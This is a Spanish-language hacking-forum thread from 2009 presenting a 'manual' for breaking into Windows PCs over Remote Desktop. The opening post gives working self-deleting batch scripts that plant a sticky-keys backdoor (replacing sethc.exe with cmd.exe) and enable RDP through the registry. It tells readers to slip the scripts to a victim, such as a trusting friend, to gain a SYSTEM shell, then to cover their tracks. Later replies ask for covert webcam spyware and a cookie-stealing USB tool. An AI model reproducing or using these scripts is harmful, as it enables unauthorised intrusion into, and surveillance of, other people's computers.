[Manual] - Hackear por Escritorio Remoto de Windows (Por Puerto 3389)

Tema en 'Manuales y Tutoriales' iniciado por tomy321, 20 Abr 2009.

  1. tomy321

    tomy321 Usuario Nuevo nvl. 1
    187/244

    Registrado:
    15 Abr 2009
    Mensajes:
    524
    Me Gusta recibidos:
    2
    Hackear por Escritorio Remoto de Windows

    1)Escanear los puertos, para ver si tiene el puerto 3389 (El de escritorio
    remoto)abierto, si es que tiene el puerto habilitado seguir el paso 2), si es que el puerto y Escritorio Remoto no esta funcionando el pasar al paso 2.1):

    2)Crear un batch que haga los siguiente:
    Insertar CODE, HTML o PHP:
    echo off
    title .
    Copy "c:\windows\system32\sethc.exe" "c:\windows\system32\sethc.zzz"
    Copy "c:\windows\system32\cmd.exe" "c:\windows\system32\sethc.exe"
    del %0
    exit
    Este batch lo que hace es crearnos un agujero para poder pasar. Setch es el programita que inicia cuando presionamos 5 veses Shift. Tambien es posible utilizar Sethc.exe en el escritorio Remoto de Windows.
    Luego de alguna forma mandamos el batch a nuestra victima y cuando lo abra nos abrira el paso
    y el batch se autoborrara.

    2.1)Si es que no tiene habilitado el "Escritorio Remoto de Windows" creamos
    el siguiente Batch para activarlo y crear el agujero que nos dejara pasar.
    Insertar CODE, HTML o PHP:
    echo off
    title .
    cls
    Copy "c:\windows\system32\sethc.exe" "c:\windows\system32\sethc.zzz"
    Copy "c:\windows\system32\cmd.exe" "c:\windows\system32\sethc.exe"
    reg delete "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnect ions /f
    reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnect ions /t "REG_DWORD" /d 0
    del %0
    exit
    Y esto se lo enviamos ha la victima de alguna forma y al momento de abrirlo nos habilitara el
    "Escritorio Remoto de Windows" y nos abrira el paso y el Batch se AutoBorrara.

    3)Luego abrimos Inicio/programas/Accesorios/comunicaciones/ConeXion a escritorio remoto
    Presionamos opciones, y rellenamos los datos de la pestaña General de la siguiente forma:
    Equipo:1.2.3.4 <- Direcciona IP de la victima
    Nombre de Usuario: <-No ponemos nada lo dejamos Vacio
    Contraseña: <-Lo dejamos vacio.
    Dominio: <-Lo dejamos vacio.


    Luego nos pasamos a la pestaña "Recursos locales"
    y cambiamos solo la opcion "Teclado", desplegamos la lista y seleccionamos "En el equipo remoto"

    4)Luego click en conectar.

    5)Cuando nos salga la ventanita pidiendo USER/PASS presionamos 5 veses SHIFT y nos saldra la ventanita de DOS en el equipo remoto y STICKYKEYS en nuestra maquina, el STICKYKEYS de nuestra maquina lo cerramos para que no nos moleste.

    6)Ahora tenemos acceso a la raiz osea como SYSTEM (NT AUTHORITY\SYSTEM) teniendo es DOS en la mano, podemos iniciar algunos servicios como ser el telnet, o podemos modificar algunas cosas de su PC. (Esto si quieren, inicien: Compmgmt.msc).

    7)Para finalizar debemos borrar el programa que nos dejo pasar, Recuerdan que hize una copia de Sethc.exe a Sethc.zzz ahora tenemos que volver las cosas como estaban.
    Insertar CODE, HTML o PHP:
    copy "c:\windows\system32\setch.zzz" "c:\windows\system32\setch.exe"
    del "c:\windows\system32\setch.zzz"

    Microsoft creo "Escritorio Remoto de Windows" para que lo Explotemos
    y lo usemos cuando no tengamos un troyano ha mano. (Claro que tambien es una herramienta util..)


    EXPLICACION DEL MANUAL.
    Cuando enciendes un ordenador, normalmente pide un user y un pass, se podría cambiando los valores de CMD por StickyKeys, cuando estas para meter la pass, pulsas 5 veces shift, y se abriría CMD, ya desde ahí podrías ejecutar servicios, etc...
    Con ingenieria social intentariamos colar los .bat
    Por ejemplo, quieres entrar al de tu amigo (uno que se confie), le pasas los bats, te haces con su ip, y lo intentas jeje



    Saludoss!!
    AGRADESCAN y acepto chuchadas.

    by neohx.
     
  2. cfslack

    cfslack Usuario Casual nvl. 2
    37/41

    Registrado:
    29 Dic 2006
    Mensajes:
    3.266
    Me Gusta recibidos:
    7
    Pega la fuente weon
     
  3. MdkUS

    MdkUS Usuario Casual nvl. 2
    86/163

    Registrado:
    27 Ene 2006
    Mensajes:
    8.230
    Me Gusta recibidos:
    0
    +1 waajajja! :D
     
  4. Sidneius

    Sidneius Usuario Casual nvl. 2
    47/82

    Registrado:
    20 Dic 2008
    Mensajes:
    1.379
    Me Gusta recibidos:
    42
    ta buena lo probaremos.Gracias

    ¿Neoh y Comrade? me suenan mmmmmm... ¿No andara Kevin Mitnick x aca tambien XDDD?



    "El Arte de la Intrusion"
     
  5. tomy321

    tomy321 Usuario Nuevo nvl. 1
    17/41

    Registrado:
    15 Abr 2009
    Mensajes:
    524
    Me Gusta recibidos:
    2
    jaja sipo si mi hermano ql se hace llamar comrade pero yo saq el mio de matrix jajaj
    no cachaste mi firma con neo y kevin mitnick a un lado¿?
     
  6. Sidneius

    Sidneius Usuario Casual nvl. 2
    47/82

    Registrado:
    20 Dic 2008
    Mensajes:
    1.379
    Me Gusta recibidos:
    42

    Si perro, si lo caxe x eso puse la nota

    Saludos
     
  7. ThEgOtHiCk

    ThEgOtHiCk Usuario Nuevo nvl. 1
    6/41

    Registrado:
    14 May 2009
    Mensajes:
    35
    Me Gusta recibidos:
    0
    jajaja como escaneo los puertos, un programa? estube buscando algun scaner para escanear puertos r IP´s pero no me resulto, aca en el foro habra uno? bueno gracias por responder y buen aporte amigo saludos :D
     
  8. di_piterson

    di_piterson Usuario Nuevo nvl. 1
    17/41

    Registrado:
    5 Jun 2008
    Mensajes:
    507
    Me Gusta recibidos:
    1
    se agradece tazando
     
  9. hunter25x

    hunter25x Usuario Nuevo nvl. 1
    1/41

    Registrado:
    24 Ago 2007
    Mensajes:
    14
    Me Gusta recibidos:
    0
    Amigos, hola, yo soy nuevo en este asunto y me gustaría saber cómo realizar un programa o si es que existe alguno que me permita:
    • Controlar la Webcan remotamente y sin tener que hacer tanto escándalo como he visto en varios programas, así como también, que sea fácil de instalar en el equipo remoto. En lo posible que se instale &#8220;sólo&#8221; por ejemplo al abrir una foto&#8230;&#8230;.
    • Algún programa que me permita al instalar por ejemplo 1 pentdrive en un equipo copiar las cookies que existen en este tipo a mi dispositivo portátil sin que el dueño d el equipo se de cuenta.
    • Como puedo realizar una base de dato en la cual por ejemplo a través de un email las personas respondan unas preguntas y merced de las respuestas en forma de base de datos.
    Yo he leído bastante al respecto y todos los programas que he encontrado para el tema 1 requieran realizar muchos pasos y todos son detectados por los antivirus.
    Respecto del tema 2, también he leído al respecto y no he podido conseguir el programa apropiado y también en los que he conseguido son detectados por los antivirus.

    El equipo desde el cual deseo llevar a cabo estas intromisiones utiliza window vista,
    ¿Cómo puedo obtener el Password de la cookie
    Muchas gracias amigos
     
  10. t3rr0rist

    t3rr0rist Usuario Nuevo nvl. 1
    1/41

    Registrado:
    13 Abr 2009
    Mensajes:
    3
    Me Gusta recibidos:
    0
    jajja la wea esa la eh visto en otro web haber una peruana cascalammers la vi si estoy en ese lugar el mismo tuto kjakjjajka
     
  11. donwe@.com

    [email protected] Usuario Casual nvl. 2
    37/41

    Registrado:
    15 Dic 2008
    Mensajes:
    4.304
    Me Gusta recibidos:
    1
    buena perro vamos a probar... se agradece
     
  12. walox

    walox Usuario Habitual nvl.3 ★
    187/244

    Registrado:
    19 Ago 2007
    Mensajes:
    22.594
    Me Gusta recibidos:
    8
    arto penka tu tuto men
    jajaja
    hackear por 3389
    por defecto ese puerto lo trae win
    solo lo habilitas en mi pc propiedades remoto
    es mejor entrar cn un nmap a una ip valida y desde ahi romper los bug defacing

    suerte y no uses copy paste lol